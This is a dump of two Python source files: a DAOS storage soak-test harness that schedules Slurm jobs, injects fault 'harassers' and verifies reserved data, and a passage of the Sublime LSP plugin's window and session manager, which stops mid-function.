| source | python |
|---|---|
test_base.py
|
#!/usr/bin/python
"""
(C) Copyright 2019-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import os
import time
from datetime import datetime, timedelta
import multiprocessing
import threading
import random
from filecmp import cmp
from apricot import TestWithServers
from general_utils import run_command, DaosTestError, get_log_file
from command_utils_base import CommandFailure
import slurm_utils
from ClusterShell.NodeSet import NodeSet
from getpass import getuser
import socket
from agent_utils import include_local_host
from utils import DDHHMMSS_format, add_pools, get_remote_logs, \
launch_snapshot, launch_exclude_reintegrate, \
create_ior_cmdline, cleanup_dfuse, create_fio_cmdline, \
build_job_script, SoakTestError, launch_server_stop_start, get_harassers, \
create_racer_cmdline, run_event_check, run_monitor_check, \
create_mdtest_cmdline, reserved_file_copy, run_metrics_check
class SoakTestBase(TestWithServers):
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-instance-attributes
"""Execute DAOS Soak test cases.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a SoakBase object."""
super().__init__(*args, **kwargs)
self.failed_job_id_list = None
self.test_log_dir = None
self.exclude_slurm_nodes = None
self.loop = None
self.log_dir = None
self.outputsoakdir = None
self.test_name = None
self.test_timeout = None
self.end_time = None
self.soak_results = None
self.srun_params = None
self.harassers = None
self.offline_harassers = None
self.harasser_results = None
self.all_failed_jobs = None
self.username = None
self.used = None
self.dfuse = []
self.harasser_args = None
self.harasser_loop_time = None
self.all_failed_harassers = None
self.soak_errors = None
self.check_errors = None
def setUp(self):
"""Define test setup to be done."""
self.log.info("<<setUp Started>> at %s", time.ctime())
super().setUp()
self.username = getuser()
# Initialize loop param for all tests
self.loop = 1
self.exclude_slurm_nodes = []
# Setup logging directories for soak logfiles
# self.output dir is an avocado directory .../data/
self.log_dir = get_log_file("soak")
self.outputsoakdir = self.outputdir + "/soak"
# Create the remote log directories on all client nodes
self.test_log_dir = self.log_dir + "/pass" + str(self.loop)
self.local_pass_dir = self.outputsoakdir + "/pass" + str(self.loop)
self.sharedlog_dir = self.tmp + "/soak"
self.sharedsoakdir = self.sharedlog_dir + "/pass" + str(self.loop)
# Initialize dmg cmd
self.dmg_command = self.get_dmg_command()
# Fail if slurm partition is not defined
# NOTE: Slurm reservation and partition are created before soak runs.
# CI uses partition=daos_client and no reservation.
# A21 uses partition=normal/default and reservation=daos-test.
# Partition and reservation names are updated in the yaml file.
# It is assumed that if there is no reservation (CI only), then all
# the nodes in the partition will be used for soak.
if not self.client_partition:
raise SoakTestError(
"<<FAILED: Partition is not correctly setup for daos "
"slurm partition>>")
self.srun_params = {"partition": self.client_partition}
if self.client_reservation:
self.srun_params["reservation"] = self.client_reservation
# Check if the server nodes are in the client list;
# this will happen when only one partition is specified
for host_server in self.hostlist_servers:
if host_server in self.hostlist_clients:
self.hostlist_clients.remove(host_server)
self.exclude_slurm_nodes.append(host_server)
# Include test node for log cleanup; remove from client list
local_host_list = include_local_host(None)
self.exclude_slurm_nodes.extend(local_host_list)
if local_host_list[0] in self.hostlist_clients:
self.hostlist_clients.remove((local_host_list[0]))
if not self.hostlist_clients:
self.fail(
"There are no valid nodes in this partition to run "
"soak. Check partition {} for valid nodes".format(
self.client_partition))
def pre_tear_down(self):
"""Tear down any test-specific steps prior to running tearDown().
Returns:
list: a list of error strings to report after all tear down
steps have been attempted
"""
self.log.info("<<preTearDown Started>> at %s", time.ctime())
errors = []
# display final metrics
run_metrics_check(self, prefix="final")
# clear out any jobs in squeue;
if self.failed_job_id_list:
job_id = " ".join([str(job) for job in self.failed_job_id_list])
self.log.info("<<Cancel jobs in queue with ids %s >>", job_id)
try:
run_command(
"scancel --partition {} -u {} {}".format(
self.client_partition, self.username, job_id))
except DaosTestError as error:
# Exception was raised due to a non-zero exit status
errors.append("Failed to cancel jobs {}: {}".format(
self.failed_job_id_list, error))
if self.all_failed_jobs:
errors.append("SOAK FAILED: The following jobs failed {} ".format(
" ,".join(str(j_id) for j_id in self.all_failed_jobs)))
if self.all_failed_harassers:
errors.extend(self.all_failed_harassers)
if self.soak_errors:
errors.extend(self.soak_errors)
if self.check_errors:
errors.extend(self.check_errors)
# Check if any dfuse mount points need to be cleaned
cleanup_dfuse(self)
# daos_agent is always started on this node when start agent is false
if not self.setup_start_agents:
self.hostlist_clients = [socket.gethostname().split('.', 1)[0]]
for error in errors:
self.log.info("<<ERRORS: %s >>\n", error)
return errors
def launch_harasser(self, harasser, pool):
"""Launch any harasser tests if defined in yaml.
Args:
harasser (str): harasser to launch
pool (list): list of TestPool obj
Returns:
status_msg(str): pass/fail status message
"""
# Init the status message
status_msg = None
job = None
results = multiprocessing.Queue()
args = multiprocessing.Queue()
# Launch harasser
self.log.info("\n<<<Launch harasser %s>>>\n", harasser)
if harasser == "snapshot":
method = launch_snapshot
name = "SNAPSHOT"
params = (self, self.pool[0], name)
job = threading.Thread(target=method, args=params, name=name)
elif harasser == "exclude":
method = launch_exclude_reintegrate
name = "EXCLUDE"
params = (self, pool[1], name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "reintegrate":
method = launch_exclude_reintegrate
name = "REINTEGRATE"
params = (self, pool[1], name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-stop":
method = launch_server_stop_start
name = "SVR_STOP"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-start":
method = launch_server_stop_start
name = "SVR_START"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-reintegrate":
method = launch_server_stop_start
name = "SVR_REINTEGRATE"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
else:
raise SoakTestError(
"<<FAILED: Harasser {} is not supported. ".format(
harasser))
# start harasser
job.start()
timeout = self.params.get("harasser_to", "/run/soak_harassers/*", 30)
# Wait for harasser job to join
job.join(timeout)
if job.is_alive():
self.log.error(
"<< ERROR: harasser %s is alive, failed to join>>", job.name)
if name not in ["REBUILD", "SNAPSHOT"]:
job.terminate()
status_msg = "<<FAILED: {} has been terminated.".format(name)
raise SoakTestError(
"<<FAILED: Soak failed while running {} . ".format(name))
if name not in ["REBUILD", "SNAPSHOT"]:
self.harasser_results = results.get()
self.harasser_args = args.get()
# Check if the completed job passed
self.log.info("Harasser results: %s", self.harasser_results)
self.log.info("Harasser args: %s", self.harasser_args)
if not self.harasser_results[name.upper()]:
status_msg = "<< HARASSER {} FAILED in pass {} at {}>> ".format(
name, self.loop, time.ctime())
self.log.error(status_msg)
return status_msg
def harasser_job_done(self, args):
"""Call this function when a job is done.
Args:
args (list):name job name of harasser,
status job completion status
vars: variables used in harasser
"""
self.harasser_results[args["name"]] = args["status"]
self.harasser_args[args["name"]] = args["vars"]
def job_setup(self, jobs, pool):
"""Create the cmdline needed to launch job.
Args:
jobs(list): list of jobs to run
pool (obj): TestPool obj
Returns:
job_cmdlist: list of sbatch scripts that can be launched
by slurm job manager
"""
job_cmdlist = []
self.log.info("<<Job_Setup %s >> at %s", self.test_name, time.ctime())
for job in jobs:
jobscript = []
commands = []
nodesperjob = self.params.get(
"nodesperjob", "/run/" + job + "/*", [1])
taskspernode = self.params.get(
"taskspernode", "/run/" + job + "/*", [1])
for npj in list(nodesperjob):
# nodesperjob = -1 indicates to use all nodes in client hostlist
if npj < 0:
npj = len(self.hostlist_clients)
if len(self.hostlist_clients)/npj < 1:
raise SoakTestError(
"<<FAILED: There are only {} client nodes for this job."
" Job requires {}".format(
len(self.hostlist_clients), npj))
for ppn in list(taskspernode):
if "ior" in job:
commands = create_ior_cmdline(self, job, pool, ppn, npj)
elif "fio" in job:
commands = create_fio_cmdline(self, job, pool)
elif "mdtest" in job:
commands = create_mdtest_cmdline(
self, job, pool, ppn, npj)
elif "daos_racer" in job:
commands = create_racer_cmdline(self, job)
else:
raise SoakTestError(
"<<FAILED: Job {} is not supported. ".format(job))
jobscript = build_job_script(self, commands, job, npj)
job_cmdlist.extend(jobscript)
return job_cmdlist
def job_startup(self, job_cmdlist):
"""Submit job batch script.
Args:
job_cmdlist (list): list of jobs to execute
Returns:
job_id_list: IDs of each job submitted to slurm.
"""
self.log.info(
"<<Job Startup - %s >> at %s", self.test_name, time.ctime())
job_id_list = []
# before submitting the jobs to the queue, check the job timeout;
if time.time() > self.end_time:
self.log.info("<< SOAK test timeout in Job Startup>>")
return job_id_list
# job_cmdlist is a list of batch script files
for script in job_cmdlist:
try:
job_id = slurm_utils.run_slurm_script(str(script))
except slurm_utils.SlurmFailed as error:
self.log.error(error)
# Force the test to exit with failure
job_id = None
if job_id:
self.log.info(
"<<Job %s started with %s >> at %s",
job_id, script, time.ctime())
slurm_utils.register_for_job_results(
job_id, self, maxwait=self.test_timeout)
# keep a list of the job_id's
job_id_list.append(int(job_id))
else:
# one of the jobs failed to queue; exit on first fail for now.
err_msg = "Slurm failed to submit job for {}".format(script)
job_id_list = []
raise SoakTestError(
"<<FAILED: Soak {}: {}>>".format(self.test_name, err_msg))
return job_id_list
def job_completion(self, job_id_list):
"""Wait for job completion and cleanup.
Args:
job_id_list: IDs of each job submitted to slurm
Returns:
failed_job_id_list: IDs of each job that failed in slurm
"""
self.log.info(
"<<Job Completion - %s >> at %s", self.test_name, time.ctime())
harasser_interval = 0
failed_harasser_msg = None
harasser_timer = time.time()
check_time = datetime.now()
event_check_messages = []
since = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# loop time exists after the first pass; no harassers in the first pass
if self.harasser_loop_time and self.harassers:
harasser_interval = self.harasser_loop_time / (
len(self.harassers) + 1)
# If there is nothing to do; exit
if job_id_list:
# wait for all the jobs to finish
while len(self.soak_results) < len(job_id_list):
# wait for the jobs to complete.
# enter tearDown before hitting the avocado timeout
if time.time() > self.end_time:
self.log.info(
"<< SOAK test timeout in Job Completion at %s >>",
time.ctime())
for job in job_id_list:
_ = slurm_utils.cancel_jobs(int(job))
# monitor events every 15 min
if datetime.now() > check_time:
run_monitor_check(self)
check_time = datetime.now() + timedelta(minutes=15)
# launch harassers if enabled;
# one harasser at a time starting on pass2
if self.harassers:
if self.loop >= 2 and (
time.time() > (harasser_timer + harasser_interval)):
harasser = self.harassers.pop(0)
harasser_timer += harasser_interval
failed_harasser_msg = self.launch_harasser(
harasser, self.pool)
time.sleep(5)
if time.time() < self.end_time:
# Run any offline harassers after first loop
if self.offline_harassers and self.loop >= 1:
for offline_harasser in self.offline_harassers:
if time.time() + int(180) < self.end_time:
failed_harasser_msg = self.launch_harasser(
offline_harasser, self.pool)
# wait 2 minutes to issue next harasser
time.sleep(120)
# Gather metrics data after jobs complete
run_metrics_check(self)
# check journalctl for events;
until = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
event_check_messages = run_event_check(self, since, until)
self.check_errors.extend(event_check_messages)
run_monitor_check(self)
# init harasser list when all jobs are done
self.harassers = []
self.offline_harassers = []
if failed_harasser_msg is not None:
self.all_failed_harassers.append(failed_harasser_msg)
# check for JobStatus = COMPLETED or CANCELLED (i.e. TEST TO)
for job, result in list(self.soak_results.items()):
if result in ["COMPLETED", "CANCELLED"]:
job_id_list.remove(int(job))
else:
self.log.info(
"<< Job %s failed with status %s>>", job, result)
# gather all the logfiles for this pass and cleanup test nodes
try:
get_remote_logs(self)
except SoakTestError as error:
self.log.info("Remote copy failed with %s", error)
self.soak_results = {}
return job_id_list
def job_done(self, args):
"""Call this function when a job is done.
Args:
args (dict): "handle" is the job ID of the submitted job and
"state" is a string indicating the job completion status
"""
self.soak_results[args["handle"]] = args["state"]
def execute_jobs(self, jobs, pools):
"""Execute the overall soak test.
Args:
jobs (list): list of job names to run
pools (list): list of TestPool obj - self.pool[1:]
Raise:
SoakTestError
"""
job_script_list = []
# Update the remote log directories from new loop/pass
self.sharedsoakdir = self.sharedlog_dir + "/pass" + str(self.loop)
self.test_log_dir = self.log_dir + "/pass" + str(self.loop)
local_pass_dir = self.outputsoakdir + "/pass" + str(self.loop)
result = slurm_utils.srun(
NodeSet.fromlist(self.hostlist_clients), "mkdir -p {}".format(
self.test_log_dir), self.srun_params)
if result.exit_status > 0:
raise SoakTestError(
"<<FAILED: logfile directory not"
"created on clients>>: {}".format(self.hostlist_clients))
# Create local log directory
os.makedirs(local_pass_dir)
os.makedirs(self.sharedsoakdir)
# create the batch scripts
job_script_list = self.job_setup(jobs, pools)
# randomize job list
random.seed(4)
random.shuffle(job_script_list)
# Gather the job_ids
job_id_list = self.job_startup(job_script_list)
# Initialize the failed_job_list to job_list so that any
# unexpected failures will clear the squeue in tearDown
self.failed_job_id_list = job_id_list
# Wait for jobs to finish and cancel/kill jobs if necessary
self.failed_job_id_list = self.job_completion(job_id_list)
# Log the failing job ID
if self.failed_job_id_list:
self.log.info(
"<<FAILED: The following jobs failed %s >>", (" ,".join(
str(j_id) for j_id in self.failed_job_id_list)))
# accumulate failing job IDs
self.all_failed_jobs.extend(self.failed_job_id_list)
# clear out the failed jobs for this pass
self.failed_job_id_list = []
def run_soak(self, test_param):
"""Run the soak test specified by the test params.
Args:
test_param (str): test_params from yaml file
"""
self.soak_results = {}
self.pool = []
self.container = []
self.harasser_results = {}
self.harasser_args = {}
run_harasser = False
self.all_failed_jobs = []
self.all_failed_harassers = []
self.soak_errors = []
self.check_errors = []
self.used = []
test_to = self.params.get("test_timeout", test_param + "*")
self.test_name = self.params.get("name", test_param + "*")
single_test_pool = self.params.get(
"single_test_pool", test_param + "*", True)
harassers = self.params.get("harasserlist", test_param + "*")
job_list = self.params.get("joblist", test_param + "*")
ignore_soak_errors = self.params.get("ignore_soak_errors", test_param + "*", False)
if harassers:
run_harasser = True
self.log.info("<< Initial harasser list = %s>>", harassers)
harasserlist = harassers[:]
# Create the reserved pool with data
# self.pool is a list of all the pools used in soak
# self.pool[0] will always be the reserved pool
add_pools(self, ["pool_reserved"])
# Create the reserved container
resv_cont = self.get_container(
self.pool[0], "/run/container_reserved/*", True)
# populate reserved container with a 500MB file
initial_resv_file = os.path.join(
os.environ["DAOS_TEST_LOG_DIR"], "initial", "resv_file")
try:
reserved_file_copy(self, initial_resv_file, self.pool[0], resv_cont,
num_bytes=500000000, cmd="write")
except CommandFailure as error:
self.fail(error)
# Create pool for jobs
if single_test_pool:
add_pools(self, ["pool_jobs"])
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# cleanup soak log directories before test on all nodes
result = slurm_utils.srun(
NodeSet.fromlist(self.hostlist_clients), "rm -rf {}".format(
self.log_dir), self.srun_params)
if result.exit_status > 0:
raise SoakTestError(
"<<FAILED: Soak directories not removed"
"from clients>>: {}".format(self.hostlist_clients))
# cleanup test_node
for log_dir in [self.log_dir, self.sharedlog_dir]:
cmd = "rm -rf {}".format(log_dir)
try:
result = run_command(cmd, timeout=30)
except DaosTestError as error:
raise SoakTestError(
"<<FAILED: Soak directory {} was not removed>>".format(
log_dir)) from error
# Baseline metrics data
run_metrics_check(self, prefix="initial")
# Initialize time
start_time = time.time()
self.test_timeout = int(3600 * test_to)
self.end_time = start_time + self.test_timeout
self.log.info("<<START %s >> at %s", self.test_name, time.ctime())
while time.time() < self.end_time:
# Start new pass
start_loop_time = time.time()
self.log.info(
"<<SOAK LOOP %s: time until done %s>>", self.loop,
DDHHMMSS_format(self.end_time - time.time()))
if not single_test_pool:
# Create pool for jobs
add_pools(self, ["pool_jobs"])
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# Initialize harassers
if run_harasser:
if not harasserlist:
harasserlist = harassers[:]
harasser = harasserlist.pop(0)
self.harasser_args = {}
self.harasser_results = {}
self.harassers, self.offline_harassers = get_harassers(harasser)
try:
self.execute_jobs(job_list, self.pool[1])
except SoakTestError as error:
self.fail(error)
# Check space after jobs done
for pool in self.pool:
self.dmg_command.pool_query(pool.uuid)
# Cleanup any dfuse mounts before destroying containers
cleanup_dfuse(self)
self.soak_errors.extend(self.destroy_containers(self.container))
self.container = []
# Remove the test pools from self.pool; preserving reserved pool
if not single_test_pool:
self.soak_errors.extend(self.destroy_pools(self.pool[1]))
self.pool = [self.pool[0]]
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# Fail if the pool/containers did not clean up correctly
if not ignore_soak_errors:
self.assertEqual(
len(self.soak_errors), 0, "\n".join(self.soak_errors))
# Break out of loop if smoke
if "smoke" in self.test_name:
break
loop_time = time.time() - start_loop_time
self.log.info(
"<<LOOP %s completed in %s at %s>>", self.loop, DDHHMMSS_format(
loop_time), time.ctime())
# Initialize harasser loop time from first pass loop time
if self.loop == 1 and run_harasser:
self.harasser_loop_time = loop_time
self.loop += 1
# verify reserved container data
final_resv_file = os.path.join(
os.environ["DAOS_TEST_LOG_DIR"], "final", "resv_file")
try:
reserved_file_copy(self, final_resv_file, self.pool[0], resv_cont)
except CommandFailure as error:
self.soak_errors.append(
"<<FAILED: Soak reserved container read failed>>")
if not cmp(initial_resv_file, final_resv_file):
self.soak_errors.append("Data verification error on reserved pool"
" after SOAK completed")
for file in [initial_resv_file, final_resv_file]:
if os.path.isfile(file):
file_name = os.path.split(os.path.dirname(file))[-1]
# save a copy of the POSIX file in self.outputsoakdir
copy_cmd = "cp -p {} {}/{}_resv_file".format(
file, self.outputsoakdir, file_name)
try:
run_command(copy_cmd, timeout=30)
except DaosTestError as error:
self.soak_errors.append(
"Reserved data file {} failed to archive".format(file))
os.remove(file)
self.container.append(resv_cont)
# Gather the daos logs from the client nodes
self.log.info(
"<<<<SOAK TOTAL TEST TIME = %s>>>>", DDHHMMSS_format(
time.time() - start_time))
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import DiagnosticsCursor
from .diagnostics import DiagnosticsWalker
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import update_server_panel
from .protocol import Diagnostic
from .protocol import Error
from .protocol import Point
from .rpc import Logger
from .sessions import get_plugin
from .sessions import Manager
from .sessions import Session
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Mapping, Iterable
from .views import diagnostic_to_phantom
from .views import extract_variables
from .workspace import disable_in_project
from .workspace import enable_in_project
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from copy import deepcopy
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import json
import os
import sublime
import threading
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@property
@abstractmethod
def manager(self) -> "WindowManager":
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Dict[str, List[Diagnostic]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_panel_contribution_async(self) -> List[str]:
raise NotImplementedError()
@abstractmethod
def sum_total_errors_and_warnings_async(self) -> Tuple[int, int]:
raise NotImplementedError()
@abstractmethod
def update_diagnostic_in_status_bar_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._cursor = DiagnosticsCursor(userprefs().show_diagnostics_severity_level)
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self._workspace.update()
self._configs.update()
def enable_config_async(self, config_name: str) -> None:
enable_in_project(self._window, config_name)
# TODO: Why doesn't enable_in_project cause on_load_project_async to be called?
self._configs.update()
def disable_config_async(self, config_name: str) -> None:
disable_in_project(self._window, config_name)
# TODO: Why doesn't disable_in_project cause on_load_project_async to be called?
self._configs.update()
def _register_listener(self, listener: AbstractViewListener) -> None:
sublime.set_timeout_async(lambda: self.register_listener_async(listener))
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
if not self._workspace.contains(listener.view):
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
return
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
return self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
if self._workspace.contains(listener.view):
for session in self._sessions:
if session.can_handle(listener.view):
# debug("registering session", session.config.name, "to listener", listener)
listener.on_session_initialized_async(session)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
if self._workspace.contains(view):
sessions = list(self._sessions)
for session in sessions:
if session.can_handle(view, capability):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name() or ''
if self._workspace.contains(view):
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
cannot_start_reason = plugin_class.can_start(
self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
self._window.status_message(cannot_start_reason)
return
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
cwd = workspace_folders[0].path if workspace_folders else None
variables = extract_variables(self._window)
if plugin_class is not None:
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
transport = create_transport(config, cwd, self._window, session, variables)
config.set_view_status(initiating_view, "initialize")
session.initialize(
variables, transport,
lambda session, is_error: self._on_post_session_initialize(initiating_view, session, is_error))
self._new_session = session
except Exception as e:
message = "\n\n".join([
"Could not start {}",
"{}",
"Server will be disabled for this window"
]).format(config.name, str(e))
exception_log("Unable to start {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_temporarily(config.name)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self.end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "{} exited with status code {}".format(config.name, exit_code)
if exception:
msg += " and message:\n\n---\n{}\n---".format(str(exception))
msg += "\n\nDo you want to restart {0}?\n\nIf you choose Cancel, {0} will "\
"be disabled for this window until you restart Sublime Text.".format(config.name)
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
view = self._window.active_view()
if view:
self.start_async(config, view)
else:
self._configs.disable_temporarily(config.name)
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: update_server_panel(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
if userprefs().log_stderr:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel:
return
to_render = [] # type: List[str]
base_dir = None
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
for listener in listeners:
local_errors, local_warnings = listener.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
contribution = listener.diagnostics_panel_contribution_async()
if not contribution:
continue
file_path = listener.view.file_name() or ""
base_dir = self.get_project_path(file_path) # What about different base dirs for multiple folders?
file_path = os.path.relpath(file_path, base_dir) if base_dir else file_path
to_render.append(" ◌ {}:".format(file_path))
to_render.extend(contribution)
if isinstance(base_dir, str):
panel.settings().set("result_base_dir", base_dir)
else:
panel.settings().erase("result_base_dir")
panel.run_command("lsp_update_panel", {"characters": "\n".join(to_render)})
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
def _can_manipulate_diagnostics_panel(self) -> bool:
active_panel = self._window.active_panel()
if active_panel is not None:
return active_panel == "output.diagnostics"
return True
def show_diagnostics_panel_async(self) -> None:
if self._can_manipulate_diagnostics_panel():
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
def hide_diagnostics_panel_async(self) -> None:
if self._can_manipulate_diagnostics_panel():
self._window.run_command("hide_panel", {"panel": "output.diagnostics"})
def select_next_diagnostic_async(self) -> None:
self._select_diagnostic_async(1)
def select_previous_diagnostic_async(self) -> None:
self._select_diagnostic_async(-1)
def unselect_diagnostic_async(self) -> None:
self._set_diagnostic_phantom(None)
def _diagnostics_by_file_async(self) -> Generator[Tuple[str, Mapping[str, Iterable[Diagnostic]]], None, None]:
for listener in self._listeners:
file_name = listener.view.file_name()
if file_name:
yield file_name, listener.diagnostics_async()
def _select_diagnostic_async(self, direction: int) -> None:
file_path = None # type: Optional[str]
point = None # type: Optional[Point]
if not self._cursor.has_value:
active_view = self._window.active_view()
if active_view:
file_path = active_view.file_name()
point = Point(*active_view.rowcol(active_view.sel()[0].begin()))
walk = self._cursor.from_diagnostic(direction) if self._cursor.has_value else self._cursor.from_position(
direction, file_path, point)
walker = DiagnosticsWalker([walk])
